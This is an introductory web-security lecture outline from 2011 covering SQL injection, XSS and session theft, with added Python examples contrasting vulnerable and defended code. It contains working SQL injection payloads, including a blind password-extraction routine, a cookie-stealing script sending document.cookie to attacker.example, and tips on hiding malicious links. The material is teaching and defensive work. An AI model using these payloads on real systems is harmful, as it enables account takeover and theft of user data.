National Central University Computer Center: Multimedia and Network Applications Information Outreach Course
Introduction to Web Application Security
Date: 2011/03/27
Lecturer: 張竟, third-year Computer Science (cwebb dot tw at gmail dot com)

Agenda
- Trash talk (嘴砲)
- OWASP Top 10
- SQL injection
- XSS
- cookie & session

Trash talk
- Don't do bad things!
- Don't get caught!
- Don't say I taught you this.

Web security?
- Early days vs. today: static vs. dynamic
- Wherever there is code, there are vulnerabilities!

Ways to attack
- the OS
- the web server
- the web application

Attack scenarios
- Attack the web server: gain privileges, steal information, use it to attack users.
- Attack other users: steal information, carry out further attacks.
- The two may be combined.

OWASP Top 10 - 2010
- A1: Injection
- A2: Cross-Site Scripting (XSS)
- A3: Broken Authentication and Session Management
- A4: Insecure Direct Object References
- A5: Cross-Site Request Forgery (CSRF)
- A6: Security Misconfiguration
- A7: Insecure Cryptographic Storage
- A8: Failure to Restrict URL Access
- A9: Insufficient Transport Layer Protection
- A10: Unvalidated Redirects and Forwards

SQL injection

Injections: the attacker's fill-in-the-blank game. Where can an attacker inject?
- databases (MySQL, MS SQL, PostgreSQL, ...)
- NoSQL stores
- directory services (LDAP)
- system commands!

How SQL is used on the web, taking a login page as the example:
- client -> web server: request carrying id and pwd
- web server -> SQL server: select * from account where id='$id' and pwd='$pwd'
- SQL server -> web server: result rows
- web server -> client: login success / failed

Why SQL?
- widely used
- stores large amounts of site data
- injection friendly

How injections work (MySQL as the example):

    $query = "select * from account where id='$id' and pwd='$pwd'";

With $id set to:

    ' or 1=1 -- 

the query the database actually sees becomes:

    select * from account where id='' or 1=1 -- ' and pwd='...'

Everything after -- is a comment, so the password check disappears and the condition is always true.

Attack skills
- union
- blind attack

Impact
- data stolen or modified
- site privileges obtained
- the whole site taken over (#)

How to defend
- use a safe API (prepared statements / parameterised queries)
- filter and escape special characters; never concatenate user input straight into the query
- run a vulnerability scanner over the code

Practice

XSS

Cross Site Scripting: writing code on someone else's website!

Background knowledge
- HTTP GET
- HTTP POST

How to attack
- attack using POST/GET
- the "scripting" ends up in the server
- strange URLs
- JavaScript / ...

Example (URL truncated in the source): http:/ ... Orange")

What may happen?
- take you to a bad site
- send your information to the attacker
- just for fun!

Just for fun: Samy, the MySpace XSS worm. Samy is my hero! Infection.

Big sites are XSSable too: MySpace, Facebook, Twitter, Plurk, ...

How to defend
- for the server: what must be escaped must be escaped; run a vulnerability scanner over the code
- for the user: be suspicious of strange links; rely on the browser / antivirus software

Practice

cookie & session

Background knowledge: cookie, session.

"A cookie is a piece of text stored by a user's web browser. A cookie can be used for authentication, storing site preferences, shopping cart contents, the identifier for a server-based session, or anything else that can be accomplished through storing text data."

"The session information is stored on the web server using the session identifier (session ID) generated as a result of the first (sometimes the first authenticated) request from the end user running a web browser. The storage of session IDs and the associated session data (user name, account number, etc.) on the web server is accomplished using a variety of techniques including, but not limited to: local memory, flat files, and databases."

If you steal the cookie, you can ...

How to steal it?

Send the cookie to the cloud! Use GET/POST to make the page send the cookie away.
ex (script truncated in the source): ... .join( ...
The server side is simple: just keep the cookie.

Who is the idiot who would click this ghastly link? http:/ ...
- hide it (ex: an iframe with width and height set to 0 or 1)
- ugly URLs are EVERYWHERE: https:/ ...

How to defend
- lock the user agent / header
- bind the session to the IP
- *don't get attacked successfully in the first place*

Locking the user agent / header:

    if (isset($_SESSION['HTTP_USER_AGENT'])) {
        // Fingerprint mismatch: the cookie is being replayed from a different client.
        if ($_SESSION['HTTP_USER_AGENT'] != md5($_SERVER['HTTP_USER_AGENT'])) {
            exit();
        }
    } else {
        // First request of the session: remember the client's User-Agent.
        $_SESSION['HTTP_USER_AGENT'] = md5($_SERVER['HTTP_USER_AGENT']);
    }

But ... if you can steal the cookie, can't you get the header too?

Practice

Q&A?

end

Reference
- http://www.owasp.org/
- http://en.wikipedia.org/
- http://goo.gl/cA3a
- http://goo.gl/IwGbX
- http://goo.gl/uQ4I1
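The SQL injection section above (the login query, the ' or 1=1 -- payload, and the union and blind skills) as a runnable example. This is added material, not code from the lecture: it uses an in-memory SQLite table named account with two constructed rows standing in for the MySQL database on the slides, and shows the vulnerable string-concatenated login beside the parameterised one the "safe API" bullet refers to.

```python
import sqlite3
import string

# Constructed sample rows; the column names follow the lecture's query.
ACCOUNTS = [
    ("alice", "s3cret"),
    ("bob", "hunter2"),
]


def make_db():
    """In-memory stand-in for the lecture's `account` table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE account (id TEXT, pwd TEXT)")
    conn.executemany("INSERT INTO account VALUES (?, ?)", ACCOUNTS)
    conn.commit()
    return conn


def login_vulnerable(conn, user_id, pwd):
    """The slide's pattern: user input pasted straight into the SQL text.
    A quote in `user_id` becomes SQL syntax, not data."""
    query = f"select * from account where id='{user_id}' and pwd='{pwd}'"
    return len(conn.execute(query).fetchall()) > 0


def login_safe(conn, user_id, pwd):
    """Parameterised query: values travel separately from the SQL text,
    so ' or 1=1 -- is looked up literally as a user id and matches nothing."""
    rows = conn.execute(
        "select * from account where id=? and pwd=?", (user_id, pwd)
    ).fetchall()
    return len(rows) > 0


def search_ids_vulnerable(conn, user_id):
    """A hypothetical search page that echoes matching ids; used to show the
    union skill: the attacker appends a UNION that reads a column the page
    was never meant to display."""
    query = f"select id from account where id='{user_id}'"
    return [row[0] for row in conn.execute(query).fetchall()]


def blind_extract(oracle, target, alphabet=string.ascii_lowercase + string.digits,
                  max_len=32):
    """Boolean-based blind injection: recover `target`'s password one character
    at a time using nothing but the login page's success/failure answer.
    `oracle(user_id, pwd)` is any function that behaves like login_vulnerable."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            # Close the id literal, test one character of pwd, comment out the
            # real password check.
            payload = f"{target}' and substr(pwd,{pos},1)='{ch}' -- "
            if oracle(payload, "x"):
                recovered += ch
                break
        else:
            break  # no character matched: the password has ended
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("bypass:", login_vulnerable(db, "' or 1=1 -- ", "anything"))
    print("safe:  ", login_safe(db, "' or 1=1 -- ", "anything"))
    print("union: ", search_ids_vulnerable(db, "' union select pwd from account -- "))
    print("blind: ", blind_extract(lambda u, p: login_vulnerable(db, u, p), "alice"))
```

The blind routine needs one request per candidate character per position, which is why real tooling optimises it, but the mechanism is exactly what the slide lists: the application leaks one bit per query, and that is enough.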
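The XSS section's "strange URL" and the cookie section's "send the cookie away with GET" as an added example, not part of the lecture. The payload, the hosts victim.example and attacker.example, and the greeting page are all constructed for illustration. It shows the reflected parameter rendered raw versus escaped, and the attribute-context caveat that escaping alone does not cover: a javascript: URL in href needs a scheme check, not just escaping.

```python
import html
from urllib.parse import urlsplit, parse_qs, urlencode

# Constructed attacker payload of the kind the slides describe: the victim's
# browser fetches an "image" whose URL carries document.cookie to the attacker.
# attacker.example is a placeholder, not a real collector.
COOKIE_THIEF = ("<script>new Image().src="
                "'http://attacker.example/c?'+document.cookie</script>")


def build_strange_url(base, name):
    """The 'strange URL' a victim is lured into clicking: the script is just a
    percent-encoded query parameter, so it survives copy-and-paste intact."""
    return base + "?" + urlencode({"name": name})


def reflected_param(url):
    """What the server reads back out of that URL (the `name` parameter)."""
    return parse_qs(urlsplit(url).query).get("name", [""])[0]


def render_greeting_vulnerable(name):
    """Echoes the parameter into the HTML body untouched: reflected XSS."""
    return f"<p>Hello, {name}!</p>"


def render_greeting_safe(name):
    """HTML-body context: '<' becomes '&lt;', so no element can be formed."""
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"


def render_link_safe(label, url):
    """Attribute context needs the value escaped AND the attribute quoted.
    Escaping does nothing against javascript: URLs, so the scheme is checked
    separately and anything that is not http(s) is neutralised."""
    scheme = urlsplit(url).scheme.lower()
    if scheme not in ("http", "https"):
        url = "#"
    return f'<a href="{html.escape(url, quote=True)}">{html.escape(label)}</a>'


def contains_script_tag(fragment):
    """Crude check: would a browser see a <script> element in this fragment?"""
    return "<script" in fragment.lower()


if __name__ == "__main__":
    url = build_strange_url("http://victim.example/hello", COOKIE_THIEF)
    print(url)
    print(render_greeting_vulnerable(reflected_param(url)))
    print(render_greeting_safe(reflected_param(url)))
    print(render_link_safe("click me", "javascript:alert(1)"))
```

html.escape with quote=True handles the body and quoted-attribute contexts; JavaScript-string and URL contexts need their own encoders, which is what "what must be escaped must be escaped" means in practice.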
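The session-binding defence from the last section (lock the User-Agent, bind the IP) and the closing question "if you can steal the cookie, can't you get the header too?" as an added example; this is not the lecture's PHP, it is a stand-alone Python session store that implements the same check. The user agent, IP addresses and user name are constructed. sha256 is used where the slide used md5; the hash only serves an equality test on request data the attacker controls anyway, so the choice does not change the security argument.

```python
import hashlib
import hmac
import secrets


class SessionStore:
    """Server-side session table keyed by the session ID carried in the cookie.
    Each session is bound to a fingerprint of the client's User-Agent and IP,
    mirroring the slide's $_SESSION['HTTP_USER_AGENT'] check plus IP binding."""

    def __init__(self):
        self._sessions = {}

    @staticmethod
    def fingerprint(user_agent, ip):
        return hashlib.sha256(f"{user_agent}\x00{ip}".encode()).hexdigest()

    def create(self, user, user_agent, ip):
        sid = secrets.token_hex(16)  # unguessable session ID for the cookie
        self._sessions[sid] = {"user": user,
                               "fp": self.fingerprint(user_agent, ip)}
        return sid

    def validate(self, sid, user_agent, ip):
        """Return the logged-in user, or None when the cookie is unknown or the
        request's fingerprint differs from the one recorded at login
        (the slide's exit())."""
        session = self._sessions.get(sid)
        if session is None:
            return None
        if not hmac.compare_digest(session["fp"],
                                   self.fingerprint(user_agent, ip)):
            return None
        return session["user"]


def replay_stolen_cookie():
    """Walk through the slide's closing question with a stolen session ID."""
    store = SessionStore()
    victim_ua = "Mozilla/5.0 (X11; Linux x86_64) Firefox/4.0"  # constructed
    victim_ip = "140.115.1.1"                                  # constructed
    attacker_ip = "203.0.113.9"                                # constructed
    sid = store.create("alice", victim_ua, victim_ip)

    return {
        # The victim's own browser keeps working.
        "victim": store.validate(sid, victim_ua, victim_ip),
        # Cookie alone, replayed from the attacker's machine: UA mismatch.
        "stolen_cookie_only": store.validate(sid, "curl/7.21.3", attacker_ip),
        # XSS can read navigator.userAgent and ship it with the cookie, so the
        # UA check falls; only the IP binding is left.
        "stolen_cookie_and_ua": store.validate(sid, victim_ua, attacker_ip),
        # Requests issued by the injected script inside the victim's browser
        # carry the victim's UA and IP, so binding does not stop them at all.
        "issued_from_victim_browser": store.validate(sid, victim_ua, victim_ip),
    }


if __name__ == "__main__":
    for scenario, user in replay_stolen_cookie().items():
        print(f"{scenario:28s} -> {user}")
```

Binding raises the bar against a naive cookie replay and nothing more, which is the slide's point: an attacker who already runs script in the victim's page either collects the header alongside the cookie or simply makes the requests from the victim's browser. IP binding also breaks legitimate users behind changing addresses (mobile networks, load-balanced proxies), so it is a trade-off rather than a fix; the real defence is not letting the script run in the first place.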